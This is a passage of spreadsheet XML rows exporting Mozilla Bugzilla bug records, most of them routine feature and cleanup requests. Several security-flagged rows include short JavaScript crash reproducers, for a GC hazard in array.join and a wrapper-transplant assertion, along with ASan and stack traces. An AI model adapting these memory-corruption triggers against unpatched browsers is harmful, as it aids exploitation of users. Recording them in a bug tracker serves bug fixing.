      <c r="Q458" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R458" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S458" t="inlineStr">
        <is>
          <t>Firefox 41</t>
        </is>
      </c>
      <c r="T458" t="n">
        <v>1</v>
      </c>
      <c r="U458" t="n">
        <v>0</v>
      </c>
      <c r="V458" t="n">
        <v>23</v>
      </c>
      <c r="W458" t="inlineStr">
        <is>
          <t>The titlebar on Windows 10 is now fully light gray, darkening the icons would increase the contrast, and would as well improve consistency with other apps, which have a dark icon style.</t>
        </is>
      </c>
      <c r="X458" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="459">
      <c r="A459" t="n">
        <v>1147389</v>
      </c>
      <c r="B459" t="inlineStr">
        <is>
          <t>2015-03-25 07:11:53 -0700</t>
        </is>
      </c>
      <c r="C459" t="inlineStr">
        <is>
          <t>Purge some redundant padding in Failure Summary css</t>
        </is>
      </c>
      <c r="D459" t="inlineStr">
        <is>
          <t>2015-05-20 04:33:36 -0700</t>
        </is>
      </c>
      <c r="E459" t="n">
        <v>1</v>
      </c>
      <c r="F459" t="n">
        <v>1</v>
      </c>
      <c r="G459" t="n">
        <v>7</v>
      </c>
      <c r="H459" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I459" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J459" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K459" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M459" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N459" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P459" t="inlineStr"/>
      <c r="Q459" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R459" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S459" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T459" t="n">
        <v>1</v>
      </c>
      <c r="U459" t="n">
        <v>0</v>
      </c>
      <c r="V459" t="n">
        <v>7</v>
      </c>
      <c r="W459" t="inlineStr">
        <is>
          <t>We have some Failure Summary padding that is unnecessary, set as 0, and is already provided as 0 by bootstrap.
Per the convo in
https://github.com/mozilla/treeherder-ui/commit/b0190967168d1ad152d0a08bace4a4fd1e5403cf#commitcomment-10371564
Worlds shortest PR, but I figure it doesn't hurt to document the above.
ul.failure-summary-list is not used anywhere else based on the repo search.</t>
        </is>
      </c>
      <c r="X459" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" t="n">
        <v>720079</v>
      </c>
      <c r="B460" t="inlineStr">
        <is>
          <t>2012-01-20 22:27:11 -0800</t>
        </is>
      </c>
      <c r="C460" t="inlineStr">
        <is>
          <t>array.join("") is GC-hazardous</t>
        </is>
      </c>
      <c r="D460" t="inlineStr">
        <is>
          <t>2012-04-10 21:32:28 -0700</t>
        </is>
      </c>
      <c r="E460" t="n">
        <v>1</v>
      </c>
      <c r="F460" t="n">
        <v>1</v>
      </c>
      <c r="G460" t="n">
        <v>3</v>
      </c>
      <c r="H460" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I460" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J460" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K460" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L460" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M460" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N460" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P460" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q460" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R460" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S460" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T460" t="n">
        <v>1</v>
      </c>
      <c r="U460" t="n">
        <v>0</v>
      </c>
      <c r="V460" t="n">
        <v>18</v>
      </c>
      <c r="W460" t="inlineStr">
        <is>
          <t>/* Elements beyond the initialized length are 'undefined' and thus can be ignored. */
    const Value *beg = obj-&gt;getDenseArrayElements();
    const Value *end = beg + Min(length, obj-&gt;getDenseArrayInitializedLength());
    for (const Value *vp = beg; vp != end; ++vp) {
        if (!JS_CHECK_OPERATION_LIMIT(cx))
            return false;
        if (!vp-&gt;isMagic(JS_ARRAY_HOLE) &amp;&amp; !vp-&gt;isNullOrUndefined()) {
            if (!ValueToStringBuffer(cx, *vp, sb))
                return false;
        }
    }
ValueToStringBuffer can invoke arbitrary user code, making the raw element iteration patently unsafe.  See this, for example (code which should include no random-looking doubles of the sort printed, obviously):
[jwalden@wheres-wally src]$ dbg/js
js&gt; var arr = [1, 2, 3, 4, 5, 6, 7, { toString: function() { arr.length = 0; gc(); arr.foopy = 17; gc(); arr = null; gc(); var q = 0; while (q++ &lt; 1e3) void {}; gc(); return "bwhahaha"; } }, 9, 10, 11, {}, 13, 14, 15, 16, { toString: function() { return 42; } }, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27]; arr.join("")
"1234567bwhahaha95.6e-3221.3796150552635895e-3061.0569372456451826e-3078.900719840310492e-3087.56546841585253e-3071.6021903463369686e-3069.457005280256007e-3087.78797919583446e-3089.346084319948922e-3078.90056706334849e-3081.223875502684094e-3071.390773018919187e-3080231.63e-32201.018557979663e-3121.6e-322"</t>
        </is>
      </c>
      <c r="X460" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="461">
      <c r="A461" t="n">
        <v>893077</v>
      </c>
      <c r="B461" t="inlineStr">
        <is>
          <t>2013-07-12 10:35:49 -0700</t>
        </is>
      </c>
      <c r="C461" t="inlineStr">
        <is>
          <t>Remove add-ons contest promotion on AMO</t>
        </is>
      </c>
      <c r="D461" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E461" t="n">
        <v>1</v>
      </c>
      <c r="F461" t="n">
        <v>1</v>
      </c>
      <c r="G461" t="n">
        <v>6</v>
      </c>
      <c r="H461" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I461" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J461" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K461" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L461" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M461" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N461" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P461" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q461" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R461" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S461" t="inlineStr">
        <is>
          <t>2013-07-18</t>
        </is>
      </c>
      <c r="T461" t="n">
        <v>1</v>
      </c>
      <c r="U461" t="n">
        <v>0</v>
      </c>
      <c r="V461" t="n">
        <v>3</v>
      </c>
      <c r="W461" t="inlineStr">
        <is>
          <t>The contest ends on July 18, so we need to remove the promos during next Thursday's push. 
Here were the promos that need to be removed: https://bugzilla.mozilla.org/show_bug.cgi?id=878320
1) I can take down the homepage one myself using the admin tool.
2) Please replace the old Editor promo, but let's take the opportunity to change "AMO Editor" to "AMO Reviewer"
3) Remove
4) Please replace the old Editor promo, but let's take the opportunity to change "AMO Editor" to "AMO Reviewer"
Thanks!</t>
        </is>
      </c>
      <c r="X461" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" t="n">
        <v>1378804</v>
      </c>
      <c r="B462" t="inlineStr">
        <is>
          <t>2017-07-06 08:00:56 -0700</t>
        </is>
      </c>
      <c r="C462" t="inlineStr">
        <is>
          <t>Add process metrics to experiment analysis job</t>
        </is>
      </c>
      <c r="D462" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:01 -0700</t>
        </is>
      </c>
      <c r="E462" t="n">
        <v>1</v>
      </c>
      <c r="F462" t="n">
        <v>1</v>
      </c>
      <c r="G462" t="n">
        <v>2</v>
      </c>
      <c r="H462" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I462" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J462" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K462" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L462" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M462" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N462" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P462" t="inlineStr"/>
      <c r="Q462" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R462" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S462" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T462" t="n">
        <v>1</v>
      </c>
      <c r="U462" t="n">
        <v>0</v>
      </c>
      <c r="V462" t="n">
        <v>2</v>
      </c>
      <c r="W462" t="inlineStr">
        <is>
          <t>Process scalars were added to main summary but they're not showing up in experiment viewer -- we should figure out where in the pipeline they're falling out and make sure they get to the end.</t>
        </is>
      </c>
      <c r="X462" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="463">
      <c r="A463" t="n">
        <v>1621853</v>
      </c>
      <c r="B463" t="inlineStr">
        <is>
          <t>2020-03-11 21:45:51 -0700</t>
        </is>
      </c>
      <c r="C463" t="inlineStr">
        <is>
          <t>Generated passwords are shared between separate private sessions of the same browser session</t>
        </is>
      </c>
      <c r="D463" t="inlineStr">
        <is>
          <t>2020-06-05 00:40:27 -0700</t>
        </is>
      </c>
      <c r="E463" t="n">
        <v>1</v>
      </c>
      <c r="F463" t="n">
        <v>1</v>
      </c>
      <c r="G463" t="n">
        <v>3</v>
      </c>
      <c r="H463" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I463" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J463" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K463" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L463" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N463" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P463" t="inlineStr">
        <is>
          <t>[adv-main75+]</t>
        </is>
      </c>
      <c r="Q463" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R463" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S463" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T463" t="n">
        <v>1</v>
      </c>
      <c r="U463" t="n">
        <v>0</v>
      </c>
      <c r="V463" t="n">
        <v>17</v>
      </c>
      <c r="W463" t="inlineStr">
        <is>
          <t>STR A:
Pre-req.: Have a non-private browser window open.
1. Open a private window
2. Generate a password on a website (e.g. using the context menu)
  Don't edit it or interact with the doorhanger
3. Close the private window (leaving Firefox still open e.g. due to an existing non-private window)
4. Open a new private browsing window
5. Visit the same website as step 2 and generate a password again
Expected result:
The generated password is different than in step 2 since I'm in a separate private browsing session.
Actual result:
The same generated password will be used since it was cached in `LoginManagerParent` and it didn't listen for the `last-pb-context-exited` observer notification. A user may accidentally use the same password on two accounts in two private browsing session unintentionally.
**Related problem**: Generated passwords remain in memory when the last private window is closed, even if they weren't auto-saved.
STR B:
1. Save a password with no username for a site.
2. Follow steps 1–3 above for the same site
Expected result:
Since a login with no password was already saved, the user wasn't told the password would be auto-saved (and it shouldn't be) and therefore the user thinks there are no traces of this site on their computer if they choose not to save the generated password manually.
Actual result:
The generated password is persisted in memory along side the origin in memory until the browser is shut down. The password and/or origin could be extracted from memory or via privileged code in browser developer tools.</t>
        </is>
      </c>
      <c r="X463" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" t="n">
        <v>1834711</v>
      </c>
      <c r="B464" t="inlineStr">
        <is>
          <t>2023-05-24 01:24:13 -0700</t>
        </is>
      </c>
      <c r="C464" t="inlineStr">
        <is>
          <t>Assertion failure: IsBackgroundFinalizedWhenTenured(a) == IsBackgroundFinalizedWhenTenured(b), at /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:1226</t>
        </is>
      </c>
      <c r="D464" t="inlineStr">
        <is>
          <t>2024-05-30 11:09:33 -0700</t>
        </is>
      </c>
      <c r="E464" t="n">
        <v>1</v>
      </c>
      <c r="F464" t="n">
        <v>1</v>
      </c>
      <c r="G464" t="n">
        <v>3</v>
      </c>
      <c r="H464" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I464" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J464" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K464" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N464" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P464" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main115+][adv-esr102.13+]</t>
        </is>
      </c>
      <c r="Q464" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R464" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S464" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T464" t="n">
        <v>1</v>
      </c>
      <c r="U464" t="n">
        <v>0</v>
      </c>
      <c r="V464" t="n">
        <v>29</v>
      </c>
      <c r="W464" t="inlineStr">
        <is>
          <t>Run following javascript code
```
const v3 = newGlobal();
v3.nukeAllCCWs();
const v13 = this.transplantableObject(v3);
const v27 = newGlobal({"newCompartment": true});
try {
    const t45 = v27.DataView;
    const v29 = new t45(v27);
} catch(e30) {
}
v27.firstGlobalInCompartment(v13.object);
v13.transplant(v3);
```
Stacktrace
```
#0  0x0000555556f4913d in JSObject::swap(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, js::AutoEnterOOMUnsafeRegion&amp;) ()
#1  0x00005555572c903d in js::RemapDeadWrapper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;) ()
#2  0x00005555572c8ba4 in js::RemapWrapper(JSContext*, JSObject*, JSObject*) ()
#3  0x00005555572c9770 in js::RemapAllWrappersForObject(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;) ()
#4  0x0000555557270f25 in JS_TransplantObject(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;) ()
#5  0x0000555556bd9808 in TransplantObject(JSContext*, unsigned int, JS::Value*) ()
#6  0x0000555556d0dff6 in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&amp;) ()
#7  0x0000555556d0d786 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) ()
#8  0x0000555556d1bc1b in js::Interpret(JSContext*, js::RunState&amp;) ()
#9  0x0000555556d0ccda in js::RunScript(JSContext*, js::RunState&amp;) ()
#10 0x0000555556d1045b in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;) ()
#11 0x0000555556d109a0 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;) ()
#12 0x0000555556e55120 in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) ()
#13 0x0000555556e5535c in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) ()
#14 0x0000555556be2ae9 in RunFile(JSContext*, char const*, _IO_FILE*, CompileUtf8, bool, bool) ()
#15 0x0000555556be20b0 in Process(JSContext*, char const*, bool, FileKind) ()
#16 0x0000555556b7d20d in Shell(JSContext*, js::cli::OptionParser*) ()
#17 0x0000555556b76fb0 in main ()
```</t>
        </is>
      </c>
      <c r="X464" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="465">
      <c r="A465" t="n">
        <v>94850</v>
      </c>
      <c r="B465" t="inlineStr">
        <is>
          <t>2001-08-11 04:44:57 -0700</t>
        </is>
      </c>
      <c r="C465" t="inlineStr">
        <is>
          <t>Integrate bug_email into the main code. (inbound submission and reply)</t>
        </is>
      </c>
      <c r="D465" t="inlineStr">
        <is>
          <t>2009-01-23 13:11:41 -0800</t>
        </is>
      </c>
      <c r="E465" t="n">
        <v>1</v>
      </c>
      <c r="F465" t="n">
        <v>1</v>
      </c>
      <c r="G465" t="n">
        <v>4</v>
      </c>
      <c r="H465" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I465" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J465" t="inlineStr">
        <is>
          <t>Incoming Email</t>
        </is>
      </c>
      <c r="K465" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L465" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M465" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N465" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P465" t="inlineStr"/>
      <c r="Q465" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R465" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S465" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T465" t="n">
        <v>1</v>
      </c>
      <c r="U465" t="n">
        <v>6</v>
      </c>
      <c r="V465" t="n">
        <v>42</v>
      </c>
      <c r="W465" t="inlineStr">
        <is>
          <t>We need to clean up bug_email and move it from contrib to the main code.</t>
        </is>
      </c>
      <c r="X465" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="466">
      <c r="A466" t="n">
        <v>1249578</v>
      </c>
      <c r="B466" t="inlineStr">
        <is>
          <t>2016-02-19 02:23:20 -0800</t>
        </is>
      </c>
      <c r="C466" t="inlineStr">
        <is>
          <t>Assertion failure: mTargetSize.height &lt;= aOriginalSize.height (Created a downscaler, but height is larger), at Downscaler.cpp:71</t>
        </is>
      </c>
      <c r="D466" t="inlineStr">
        <is>
          <t>2018-10-09 08:06:04 -0700</t>
        </is>
      </c>
      <c r="E466" t="n">
        <v>1</v>
      </c>
      <c r="F466" t="n">
        <v>1</v>
      </c>
      <c r="G466" t="n">
        <v>3</v>
      </c>
      <c r="H466" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I466" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J466" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K466" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L466" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M466" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N466" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P466" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q466" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R466" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S466" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T466" t="n">
        <v>1</v>
      </c>
      <c r="U466" t="n">
        <v>0</v>
      </c>
      <c r="V466" t="n">
        <v>56</v>
      </c>
      <c r="W466" t="inlineStr">
        <is>
          <t>Found via bughunter and reproduced on win 7 debug based on todays m-c tip
-&gt; Steps to reproduce: 
--&gt; Load https://duckduckgo.com/?q=erol%2Bsahin%2Bkovan
marking as s-s but feel free to reopen
Assertion failure: mTargetSize.height &lt;= aOriginalSize.height (Created a downscaler, but height is larger), at c:/Users/mozilla/debug-builds/mozilla-central/image/Downscaler.cpp:71
#01: mozilla::image::nsBMPDecoder::ReadBitfields[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d7b12c]
#02: mozilla::Maybe&lt;enum mozilla::image::TerminalState&gt;::operator*[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d740a3]
#03: mozilla::image::StreamingLexer&lt;enum mozilla::image::nsBMPDecoder::State,16&gt;::Lex&lt;&lt;lambda_4a20370f034d9119c083ef6418dfb377&gt; &gt;[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d6ca6b]
#04: mozilla::image::nsBMPDecoder::WriteInternal[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d7f098]
#05: mozilla::image::Decoder::Write[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d495f9]
#06: mozilla::image::nsICODecoder::WriteToContainedDecoder[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d827d6]
#07: mozilla::image::nsICODecoder::ReadBIH[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d7ab7c]
#08: mozilla::Maybe&lt;enum mozilla::image::TerminalState&gt;::operator*[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d74331]
#09: mozilla::image::StreamingLexer&lt;enum mozilla::image::ICOState,32&gt;::Lex&lt;&lt;lambda_df03cf4431f66e20e95916fe478c86e5&gt; &gt;[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d6d7bb]
#10: mozilla::image::nsICODecoder::WriteInternal[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d81118]
#11: mozilla::image::Decoder::Write[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d495f9]
#12: mozilla::image::Decoder::Decode[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d3c0b8]
#13: mozilla::image::DecodePool::Decode[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d3bdf4]
#14: mozilla::image::DecodePoolWorker::Run[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x1d4776c]
#15: nsThread::ProcessNextEvent[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x5c32f7]
#16: NS_ProcessNextEvent[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x62af52]
#17: mozilla::ipc::MessagePumpForNonMainThreads::Run[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xc02ef2]
#18: MessageLoop::RunInternal[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xb8939d]
#19: MessageLoop::RunHandler[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xb89312]
#20: MessageLoop::Run[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0xb88eed]
#21: nsThread::ThreadFunc[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\xul.dll +0x5cdedf]
#22: _PR_NativeRunThread[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\nss3.dll +0x2fe4cb]
#23: _PR_MD_YIELD[c:\Users\mozilla\debug-builds\mozilla-central\firefox-debug\dist\bin\nss3.dll +0x2e3889]
#24: _get_flsindex[C:\Windows\system32\MSVCR120.dll +0x2c01d]
#25: _get_flsindex[C:\Windows\system32\MSVCR120.dll +0x2c001]
#26: BaseThreadInitThunk[C:\Windows\system32\kernel32.dll +0x4ef1c]
#27: RtlInitializeExceptionChain[C:\Windows\SYSTEM32\ntdll.dll +0x63b53]
#28: RtlInitializeExceptionChain[C:\Windows\SYSTEM32\ntdll.dll +0x63b26]</t>
        </is>
      </c>
      <c r="X466" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" t="n">
        <v>771976</v>
      </c>
      <c r="B467" t="inlineStr">
        <is>
          <t>2012-07-08 21:55:12 -0700</t>
        </is>
      </c>
      <c r="C467" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozSpellChecker::SetCurrentDictionary</t>
        </is>
      </c>
      <c r="D467" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:15 -0700</t>
        </is>
      </c>
      <c r="E467" t="n">
        <v>1</v>
      </c>
      <c r="F467" t="n">
        <v>1</v>
      </c>
      <c r="G467" t="n">
        <v>3</v>
      </c>
      <c r="H467" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I467" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J467" t="inlineStr">
        <is>
          <t>Spelling checker</t>
        </is>
      </c>
      <c r="K467" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L467" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M467" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N467" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P467" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R467" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S467" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T467" t="n">
        <v>1</v>
      </c>
      <c r="U467" t="n">
        <v>0</v>
      </c>
      <c r="V467" t="n">
        <v>36</v>
      </c>
      <c r="W467" t="inlineStr">
        <is>
          <t>Reproduced on trunk. It wasn't a reliable crash, will update bug if i get a reliable testcase. Looks like |this|(mozSpellChecker) is blown from underneath[see free stack] and then causes a crash on reading its member variable here
357       mSpellCheckingEngine-&gt;SetPersonalDictionary(personalDictionary.get());
20120707214206
http://hg.mozilla.org/mozilla-central/rev/9533b40ff28b
=================================================================
==7193== ERROR: AddressSanitizer heap-use-after-free on address 0x7fd80c73caa8 at pc 0x7fd83187223d bp 0x7fff83f39930 sp 0x7fff83f39928
READ of size 8 at 0x7fd80c73caa8 thread T0
    #0 0x7fd83187223d in mozSpellChecker::SetCurrentDictionary(nsAString_internal const&amp;) extensions/spellcheck/src/mozSpellChecker.cpp:357
    #1 0x7fd83133d55d in nsEditorSpellCheck::SetCurrentDictionary(nsAString_internal const&amp;) editor/composer/src/nsEditorSpellCheck.cpp:523
    #2 0x7fd83133ede7 in nsEditorSpellCheck::UpdateCurrentDictionary() editor/composer/src/nsEditorSpellCheck.cpp:651
    #3 0x7fd83188b2d6 in mozInlineSpellChecker::UpdateCurrentDictionary() extensions/spellcheck/src/mozInlineSpellChecker.cpp:1783
    #4 0x7fd830558864 in nsEditorEventListener::Focus(nsIDOMEvent*) editor/libeditor/base/nsEditorEventListener.cpp:888
    #5 0x7fd83055392f in nsEditorEventListener::HandleEvent(nsIDOMEvent*) editor/libeditor/base/nsEditorEventListener.cpp:311
